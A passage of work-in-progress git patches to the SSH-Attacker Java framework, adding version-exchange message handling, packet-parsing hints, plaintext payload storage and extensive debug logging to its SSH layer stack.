SSH_MSG_CHANNEL_EOF((byte) 96), + SSH_MSG_CHANNEL_CLOSE((byte) 97), + SSH_MSG_CHANNEL_REQUEST((byte) 98), + SSH_MSG_CHANNEL_SUCCESS((byte) 99), + SSH_MSG_CHANNEL_FAILURE((byte) 100), + // 101 - 127 unassigned (channel related messages) + // 128 - 191 reserved (for client protocols) + // 192 - 255 reserved for private use (local extensions) + UNKNOWN((byte) 255); + private byte value; + private final Enum[] specificTo; private static final Map MAP; private ProtocolMessageType(byte value) { this.value = value; + this.specificTo = new Enum[] {}; + } + + private ProtocolMessageType(byte value, Enum... specificTo) { + this.value = value; + this.specificTo = specificTo; } static { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index e25e16aff..f9fbdab4d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -163,13 +163,16 @@ protected boolean containerAlreadyUsedByHigherLayer(Container container) { */ public HintedInputStream getDataStream() throws IOException { if (currentInputStream == null) { + LOGGER.debug("[bro] Current Inputstream is null"); receiveMoreDataForHint(null); if (currentInputStream == null) { throw new EndOfStreamException( "Could not receive data stream from lower layer, nothing more to receive"); } } + LOGGER.debug("Returned from 'more data', avilable = " + currentInputStream.available()); if (currentInputStream.available() > 0) { + LOGGER.debug("[bro] Will Return now!"); return currentInputStream; } else { if (nextInputStream != null) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index a936e2ff8..28d983556 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -36,6 +36,7 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; +import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; import java.io.ByteArrayOutputStream; import java.io.IOException; import org.apache.logging.log4j.LogManager; @@ -287,6 +288,8 @@ public void readMessageForHint(PacketLayerHint hint) { case CONNECTION: readConnectionProtocolData(); break; + case VERSION_EXCHANGE_MESSAGE: + readVerisonExchangeProtocolData(); default: LOGGER.error("Undefined record layer type"); break; @@ -298,6 +301,11 @@ private void readAuthenticationProtocolData() { readDataContainer(message, context); } + private void readVerisonExchangeProtocolData() { + VersionExchangeMessage message = new VersionExchangeMessage(); + readDataContainer(message, context); + } + private void readConnectionProtocolData() { ConnectionMessage message = new ConnectionMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 8aaa4228b..dfacba9e1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -30,14 +30,20 @@ import de.rub.nds.sshattacker.core.layer.data.Serializer; import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.parser.AbstractPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; +import de.rub.nds.sshattacker.core.protocol.connection.parser.*; +import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; +import de.rub.nds.sshattacker.core.protocol.transport.parser.*; +import java.io.ByteArrayInputStream; import java.io.IOException; import java.io.InputStream; +import java.nio.charset.StandardCharsets; import java.util.LinkedList; import java.util.List; import org.apache.logging.log4j.LogManager; @@ -303,6 +309,7 @@ private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) @Override public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + LayerProcessingHint desiredHint = hint; InputStream dataStream = getLowerLayer().getDataStream(); AbstractPacketParser parser; AbstractPacket packet; @@ -330,9 +337,191 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException context.getPacketLayer().getDecompressor().decompress(packet); addProducedContainer(packet); - PacketLayerHint currentHint; - currentHint = new PacketLayerHint(packet.getContentMessageType()); + // currentHint = new PacketLayerHint(packet.getContentMessageType()); + currentHint = temp_parser(packet, context); + + LOGGER.debug("[bro] got hint: " + currentHint.getType()); + + if (desiredHint == null || currentHint.equals(desiredHint)) { + if (currentInputStream == null) { + // only set new input stream if necessary, extend current stream otherwise + currentInputStream = new HintedLayerInputStream(currentHint, this); + } else { + currentInputStream.setHint(currentHint); + } + currentInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); + } else { + if (nextInputStream == null) { + // only set new input stream if necessary, extend current stream otherwise + nextInputStream = new HintedLayerInputStream(currentHint, this); + } else { + nextInputStream.setHint(currentHint); + } + nextInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); + } + } + + public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { + byte[] raw = packet.getPayload().getValue(); + if (packet instanceof BlobPacket) { + String rawText = new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); + if (rawText.startsWith("SSH-2.0")) { + return new PacketLayerHint(ProtocolMessageType.VERSION_EXCHANGE_MESSAGE); + } else { + final AsciiMessage message = new AsciiMessage(); + AsciiMessageParser parser = new AsciiMessageParser(new ByteArrayInputStream(raw)); + parser.parse(message); + + // If we know what the text message means we can print a + // human-readable warning to the log. The following + // messages are sent by OpenSSH. + final String messageText = message.getText().getValue(); + if ("Invalid SSH identification string.".equals(messageText)) { + LOGGER.warn( + "The server reported the identification string sent by the SSH-Attacker is invalid"); + } else if ("Exceeded MaxStartups".equals(messageText)) { + LOGGER.warn( + "The server reported the maximum number of concurrent unauthenticated connections has been exceeded."); + } + return new PacketLayerHint(ProtocolMessageType.ASCII_MESSAEG); + } + } + + LOGGER.debug("[bro] Identifier: " + raw[0]); + + /* try { + if (packet instanceof BlobPacket) { + String rawText = + new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); + if (rawText.startsWith("SSH-2.0")) { + VersionExchangeMessage message = new VersionExchangeMessage(); + VersionExchangeMessageParser parser = + new VersionExchangeMessageParser(new ByteArrayInputStream(raw)); + parser.parse(message); + return new PacketLayerHint(ProtocolMessageType.TRANSPORT); + } else { + final AsciiMessage message = new AsciiMessage(); + AsciiMessageParser parser = + new AsciiMessageParser(new ByteArrayInputStream(raw)); + parser.parse(message); + + // If we know what the text message means we can print a + // human-readable warning to the log. The following + // messages are sent by OpenSSH. + final String messageText = message.getText().getValue(); + if ("Invalid SSH identification string.".equals(messageText)) { + LOGGER.warn( + "The server reported the identification string sent by the SSH-Attacker is invalid"); + } else if ("Exceeded MaxStartups".equals(messageText)) { + LOGGER.warn( + "The server reported the maximum number of concurrent unauthenticated connections has been exceeded."); + } + return new PacketLayerHint(ProtocolMessageType.TRANSPORT); + } + } + } catch (ParserException e) { + LOGGER.debug("Error while Parsing, now parsing as UnknownMessage: " + e); + return new PacketLayerHint(ProtocolMessageType.UNKNOWN); + //return new UnknownMessageParser(raw).parse(); + }*/ + + /*switch (MessageIdConstant.fromId(raw[0], context.getContext())) { + case SSH_MSG_KEXINIT: + return new KeyExchangeInitMessageParser(raw).parse(); + case SSH_MSG_KEX_ECDH_INIT: + return new EcdhKeyExchangeInitMessageParser(raw).parse(); + case SSH_MSG_KEX_ECDH_REPLY: + return new EcdhKeyExchangeReplyMessageParser(raw).parse(); + case SSH_MSG_KEXDH_INIT: + return new DhKeyExchangeInitMessageParser(raw).parse(); + case SSH_MSG_KEXDH_REPLY: + return new DhKeyExchangeReplyMessageParser(raw).parse(); + case SSH_MSG_HBR_INIT: + return handleHybridKeyExchangeInitMessageParsing(raw, context).parse(); + case SSH_MSG_HBR_REPLY: + return handleHybridKeyExchangeReplyMessageParsing(raw, context).parse(); + case SSH_MSG_KEX_DH_GEX_REQUEST_OLD: + return new DhGexKeyExchangeOldRequestMessageParser(raw).parse(); + case SSH_MSG_KEX_DH_GEX_REQUEST: + return new DhGexKeyExchangeRequestMessageParser(raw).parse(); + case SSH_MSG_KEX_DH_GEX_GROUP: + return new DhGexKeyExchangeGroupMessageParser(raw).parse(); + case SSH_MSG_KEX_DH_GEX_INIT: + return new DhGexKeyExchangeInitMessageParser(raw).parse(); + case SSH_MSG_KEX_DH_GEX_REPLY: + return new DhGexKeyExchangeReplyMessageParser(raw).parse(); + case SSH_MSG_KEXRSA_PUBKEY: + return new RsaKeyExchangePubkeyMessageParser(raw).parse(); + case SSH_MSG_KEXRSA_SECRET: + return new RsaKeyExchangeSecretMessageParser(raw).parse(); + case SSH_MSG_KEXRSA_DONE: + return new RsaKeyExchangeDoneMessageParser(raw).parse(); + case SSH_MSG_NEWKEYS: + return new NewKeysMessageParser(raw).parse(); + case SSH_MSG_SERVICE_REQUEST: + return new ServiceRequestMessageParser(raw).parse(); + case SSH_MSG_SERVICE_ACCEPT: + return new ServiceAcceptMessageParser(raw).parse(); + case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: + return new ChannelOpenConfirmationMessageParser(raw).parse(); + case SSH_MSG_CHANNEL_DATA: + return new ChannelDataMessageParser(raw).parse(); + case SSH_MSG_CHANNEL_CLOSE: + return new ChannelCloseMessageParser(raw).parse(); + case SSH_MSG_CHANNEL_EOF: + return new ChannelEofMessageParser(raw).parse(); + case SSH_MSG_CHANNEL_EXTENDED_DATA: + return new ChannelExtendedDataMessageParser(raw).parse(); + case SSH_MSG_CHANNEL_FAILURE: + return new ChannelFailureMessageParser(raw).parse(); + case SSH_MSG_CHANNEL_OPEN_FAILURE: + return new ChannelOpenFailureMessageParser(raw).parse(); + case SSH_MSG_CHANNEL_OPEN: + return handleChannelOpenMessageParsing(raw); + case SSH_MSG_CHANNEL_SUCCESS: + return new ChannelSuccessMessageParser(raw).parse(); + case SSH_MSG_CHANNEL_WINDOW_ADJUST: + return new ChannelWindowAdjustMessageParser(raw).parse(); + case SSH_MSG_DEBUG: + return new DebugMessageParser(raw).parse(); + case SSH_MSG_DISCONNECT: + return new DisconnectMessageParser(raw).parse(); + case SSH_MSG_IGNORE: + return new IgnoreMessageParser(raw).parse(); + case SSH_MSG_REQUEST_FAILURE: + return new GlobalRequestFailureMessageParser(raw).parse(); + case SSH_MSG_REQUEST_SUCCESS: + return new GlobalRequestSuccessMessageParser(raw).parse(); + case SSH_MSG_UNIMPLEMENTED: + return new UnimplementedMessageParser(raw).parse(); + case SSH_MSG_USERAUTH_REQUEST: + return handleUserAuthRequestMessageParsing(raw); + case SSH_MSG_USERAUTH_BANNER: + return new UserAuthBannerMessageParser(raw).parse(); + case SSH_MSG_USERAUTH_FAILURE: + return new UserAuthFailureMessageParser(raw).parse(); + case SSH_MSG_USERAUTH_SUCCESS: + return new UserAuthSuccessMessageParser(raw).parse(); + case SSH_MSG_CHANNEL_REQUEST: + return handleChannelRequestMessageParsing(raw); + case SSH_MSG_GLOBAL_REQUEST: + return handleGlobalRequestMessageParsing(raw); + case SSH_MSG_USERAUTH_INFO_REQUEST: + return new UserAuthInfoRequestMessageParser(raw).parse(); + case SSH_MSG_USERAUTH_INFO_RESPONSE: + return new UserAuthInfoResponseMessageParser(raw).parse(); + default: + LOGGER.debug( + "Received unimplemented Message " + + MessageIdConstant.getNameById(raw[0]) + + " (" + + raw[0] + + ")"); + return new UnknownMessageParser(raw).parse(); + }*/ + + return null; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java index 3107142b2..ab323af6a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java @@ -40,6 +40,17 @@ public abstract class AbstractPacket> @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) private ModifiableByteArray payload; + public ModifiableByteArray getCleanProtocolMessageBytes() { + return cleanProtocolMessageBytes; + } + + public void setCleanProtocolMessageBytes(ModifiableByteArray cleanProtocolMessageBytes) { + this.cleanProtocolMessageBytes = cleanProtocolMessageBytes; + } + + @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) + private ModifiableByteArray cleanProtocolMessageBytes; + public ProtocolMessageType getContentMessageType() { return contentMessageType; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index f7cc604a7..4dbf9646d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.packet.cipher; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; @@ -318,6 +319,9 @@ private void decryptInner(AbstractPacket packet) throws CryptoException { plainData = cipher.decrypt(packet.getCiphertext().getValue()); } packet.setCompressedPayload(plainData); + ModifiableByteArray plain_modifialbel = new ModifiableByteArray(); + plain_modifialbel.setOriginalValue(plainData); + packet.setCleanProtocolMessageBytes(plain_modifialbel); } // Set the IV for the next packet if the encryption algorithm incorporates one if (encryptionAlgorithm.getIVSize() > 0) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java index f636b26ae..1a44f0729 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java @@ -8,12 +8,20 @@ package de.rub.nds.sshattacker.core.protocol.common; import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.exceptions.ParserException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.Parser; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; +import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.authentication.parser.*; import de.rub.nds.sshattacker.core.protocol.connection.parser.*; +import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; +import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; import de.rub.nds.sshattacker.core.protocol.transport.parser.*; +import java.io.ByteArrayInputStream; import java.io.InputStream; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -54,16 +62,23 @@ public final T parse() { message.getCompleteResultingMessage().getValue())); }*/ - /*public static ProtocolMessage delegateParsing(AbstractPacket packet, Context context) { + public static ProtocolMessage delegateParsing(AbstractPacket packet, SshContext context) { byte[] raw = packet.getPayload().getValue(); try { if (packet instanceof BlobPacket) { String rawText = new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); if (rawText.startsWith("SSH-2.0")) { - return new VersionExchangeMessageParser(raw).parse(); + VersionExchangeMessage message = new VersionExchangeMessage(); + VersionExchangeMessageParser parser = + new VersionExchangeMessageParser(new ByteArrayInputStream(raw)); + parser.parse(message); + return message; } else { - final AsciiMessage message = new AsciiMessageParser(raw).parse(); + final AsciiMessage message = new AsciiMessage(); + AsciiMessageParser parser = + new AsciiMessageParser(new ByteArrayInputStream(raw)); + parser.parse(message); // If we know what the text message means we can print a // human-readable warning to the log. The following @@ -80,7 +95,7 @@ public final T parse() { } } - switch (MessageIdConstant.fromId(raw[0], context)) { + /*switch (MessageIdConstant.fromId(raw[0], context.getContext())) { case SSH_MSG_KEXINIT: return new KeyExchangeInitMessageParser(raw).parse(); case SSH_MSG_KEX_ECDH_INIT: @@ -173,14 +188,15 @@ public final T parse() { + raw[0] + ")"); return new UnknownMessageParser(raw).parse(); - } + }*/ } catch (ParserException e) { LOGGER.debug("Error while Parsing, now parsing as UnknownMessage: " + e); - return new UnknownMessageParser(raw).parse(); + // return new UnknownMessageParser(raw).parse(); } + return null; } - public static HybridKeyExchangeReplyMessageParser handleHybridKeyExchangeReplyMessageParsing( + /*public static HybridKeyExchangeReplyMessageParser handleHybridKeyExchangeReplyMessageParsing( byte[] raw, Context context) { LOGGER.info( "Negotiated Hybrid Key Exchange: " From a15c9130e4646c707d3ebbbf8d2c698fe22fe5d5 Mon Sep 17 00:00:00 2001 From: Steffen Date: Sun, 11 Jun 2023 01:06:47 +0200 Subject: [PATCH 015/176] wip: sending VersionExchange is now Working (seams so) --- .../core/constants/ProtocolMessageType.java | 2 +- .../sshattacker/core/layer/LayerStack.java | 1 + .../core/layer/context/SshContext.java | 17 ++++++++++ .../core/layer/impl/SSH2Layer.java | 34 +++++++++++++++++-- .../core/layer/impl/TransportLayer.java | 10 ++++-- .../message/VersionExchangeMessage.java | 5 +++ 6 files changed, 63 insertions(+), 6 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java index f9f45ed1f..04c03c050 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java @@ -23,7 +23,7 @@ public enum ProtocolMessageType { TRANSPORT((byte) 3), VERSION_EXCHANGE_MESSAGE((byte) 0), - ASCII_MESSAEG((byte) 20), + ASCII_MESSAGE((byte) 20), SSH_MSG_DISCONNECT((byte) 1), SSH_MSG_IGNORE((byte) 2), SSH_MSG_UNIMPLEMENTED((byte) 3), diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java index ebfea7a22..8b30d6eb3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java @@ -99,6 +99,7 @@ public LayerStackProcessingResult sendData(List layerConfigu context.setTalkingConnectionEndType(context.getConnection().getLocalConnectionEndType()); // Send data for (ProtocolLayer layer : getLayerList()) { + LOGGER.debug("Layer {} sending configuration", layer.getLayerType()); layer.sendConfiguration(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index a3e6884b0..2cadc8215 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -17,9 +17,11 @@ import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; +import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; +import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; import de.rub.nds.sshattacker.core.packet.layer.PacketLayerFactory; import de.rub.nds.sshattacker.core.protocol.common.layer.MessageLayer; @@ -59,6 +61,15 @@ public PacketCompressor getCompressor() { } private AbstractPacketEncryptor encryptor; + + public void setEncryptor(AbstractPacketEncryptor encryptor) { + this.encryptor = encryptor; + } + + public void setCompressor(PacketCompressor compressor) { + this.compressor = compressor; + } + private PacketCompressor compressor; public PacketCipher getActiveDecryptCipher() { @@ -347,6 +358,12 @@ public void init() { readSequenceNumber = 0; handleAsClient = (getConnection().getLocalConnectionEndType() == ConnectionEndType.CLIENT); channelManager = new ChannelManager(this); + + encryptor = + new PacketEncryptor( + PacketCipherFactory.getNoneCipher(this, CipherMode.ENCRYPT), this); + + compressor = new PacketCompressor(); } // endregion diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 28d983556..4a66c4562 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -33,6 +33,7 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; @@ -69,6 +70,14 @@ public LayerProcessingResult sendConfiguration() throws IOException { LayerConfiguration configuration = getLayerConfiguration(); ProtocolMessageType runningProtocolMessageType = null; ByteArrayOutputStream collectedMessageStream = new ByteArrayOutputStream(); + if (configuration != null) { + LOGGER.debug( + "[bro] Sending following configuration-size {} with layer_0 is {}", + configuration.getContainerList().size(), + configuration.getContainerList().get(0).toCompactString()); + } else { + LOGGER.debug("[bro] Configuration is null"); + } if (configuration != null && configuration.getContainerList() != null) { for (ProtocolMessage message : configuration.getContainerList()) { @@ -86,11 +95,30 @@ public LayerProcessingResult sendConfiguration() throws IOException { Serializer serializer = packet.getSerializer(context); byte[] serializedMessage = serializer.serialize();*/ + LOGGER.debug("[bro] here i am with sending the message"); + /* + LOGGER.debug( + "[bro] MESSAGE: {} {}", + message.getProtocolMessageType(), + message.getCompleteResultingMessage().getValue());*/ + + ProtocolMessagePreparator preparator = message.getPreparator(context); + preparator.prepare(); + ProtocolMessageSerializer serializer = message.getSerializer(context); + LOGGER.debug("[bro] got serializer"); byte[] serializedMessage = serializer.serialize(); + LOGGER.debug("[bro] serializied the message"); message.setCompleteResultingMessage(serializedMessage); + LOGGER.debug("[bro] set complete message"); + ProtocolMessageType protocolMessageType = null; + protocolMessageType = message.getProtocolMessageType(); - getLowerLayer().sendData(null, serializedMessage); + LOGGER.debug( + "[bro] Sending Data on lower layer {}", getLowerLayer().getLayerType()); + + getLowerLayer() + .sendData(new PacketLayerHint(protocolMessageType), serializedMessage); // Es gibt erstmal keine Handshake-Messages mit einer Spezialbehandlung bei SSH /*if (!message.isHandshakeMessage()) { @@ -289,7 +317,7 @@ public void readMessageForHint(PacketLayerHint hint) { readConnectionProtocolData(); break; case VERSION_EXCHANGE_MESSAGE: - readVerisonExchangeProtocolData(); + readVersionExchangeProtocolData(); default: LOGGER.error("Undefined record layer type"); break; @@ -301,7 +329,7 @@ private void readAuthenticationProtocolData() { readDataContainer(message, context); } - private void readVerisonExchangeProtocolData() { + private void readVersionExchangeProtocolData() { VersionExchangeMessage message = new VersionExchangeMessage(); readDataContainer(message, context); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index dfacba9e1..236f30069 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -37,7 +37,6 @@ import de.rub.nds.sshattacker.core.packet.parser.AbstractPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; -import de.rub.nds.sshattacker.core.protocol.connection.parser.*; import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; import de.rub.nds.sshattacker.core.protocol.transport.parser.*; import java.io.ByteArrayInputStream; @@ -167,16 +166,23 @@ public LayerProcessingResult sendData( AbstractPacket packet; if (context.getPacketLayerType() == PacketLayerType.BLOB) { + LOGGER.debug("[bro] Created a BLOB Packet"); packet = new BlobPacket(); } else { + LOGGER.debug("[bro] Created a Binary Packet"); packet = new BinaryPacket(); } packet.setPayload(additionalData); + LOGGER.debug("[bro] Set Packetpayload"); Preparator preparator = packet.getPreparator(context); + LOGGER.debug("[bro] Got Preperator"); preparator.prepare(); + LOGGER.debug("[bro] Prepared Packetpayload"); Serializer serializer = packet.getSerializer(context); + LOGGER.debug("[bro] got Serializier"); byte[] serializedMessage = serializer.serialize(); + LOGGER.debug("[bro] Serializied Payload"); List packets = new LinkedList<>(); packets.add(packet); @@ -385,7 +391,7 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { LOGGER.warn( "The server reported the maximum number of concurrent unauthenticated connections has been exceeded."); } - return new PacketLayerHint(ProtocolMessageType.ASCII_MESSAEG); + return new PacketLayerHint(ProtocolMessageType.ASCII_MESSAGE); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java index 28c801582..e703249a3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java @@ -17,9 +17,13 @@ import de.rub.nds.sshattacker.core.protocol.transport.preparator.VersionExchangeMessagePreparator; import de.rub.nds.sshattacker.core.protocol.transport.serializer.VersionExchangeMessageSerializer; import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public class VersionExchangeMessage extends ProtocolMessage { + private static final Logger LOGGER = LogManager.getLogger(); + private ModifiableString version; private ModifiableString comment; private ModifiableString endOfMessageSequence; @@ -95,6 +99,7 @@ public VersionExchangeMessagePreparator getPreparator(SshContext context) { @Override public VersionExchangeMessageSerializer getSerializer(SshContext context) { + LOGGER.debug("[bro] getting serializer"); return new VersionExchangeMessageSerializer(this); } From c6243182715f7ec061065e1b00e9db1a41883fd3 Mon Sep 17 00:00:00 2001 From: Steffen Date: Sun, 11 Jun 2023 01:06:47 +0200 Subject: [PATCH 016/176] wip: sending VersionExchange is now Working --- .../core/constants/ProtocolMessageType.java | 2 +- .../sshattacker/core/layer/LayerStack.java | 1 + .../core/layer/context/SshContext.java | 17 ++++++ .../core/layer/impl/SSH2Layer.java | 58 ++++++++++++++++--- .../core/layer/impl/TransportLayer.java | 13 ++++- .../message/VersionExchangeMessage.java | 5 ++ 6 files changed, 86 insertions(+), 10 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java index f9f45ed1f..04c03c050 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java @@ -23,7 +23,7 @@ public enum ProtocolMessageType { TRANSPORT((byte) 3), VERSION_EXCHANGE_MESSAGE((byte) 0), - ASCII_MESSAEG((byte) 20), + ASCII_MESSAGE((byte) 20), SSH_MSG_DISCONNECT((byte) 1), SSH_MSG_IGNORE((byte) 2), SSH_MSG_UNIMPLEMENTED((byte) 3), diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java index ebfea7a22..8b30d6eb3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java @@ -99,6 +99,7 @@ public LayerStackProcessingResult sendData(List layerConfigu context.setTalkingConnectionEndType(context.getConnection().getLocalConnectionEndType()); // Send data for (ProtocolLayer layer : getLayerList()) { + LOGGER.debug("Layer {} sending configuration", layer.getLayerType()); layer.sendConfiguration(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index a3e6884b0..2cadc8215 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ 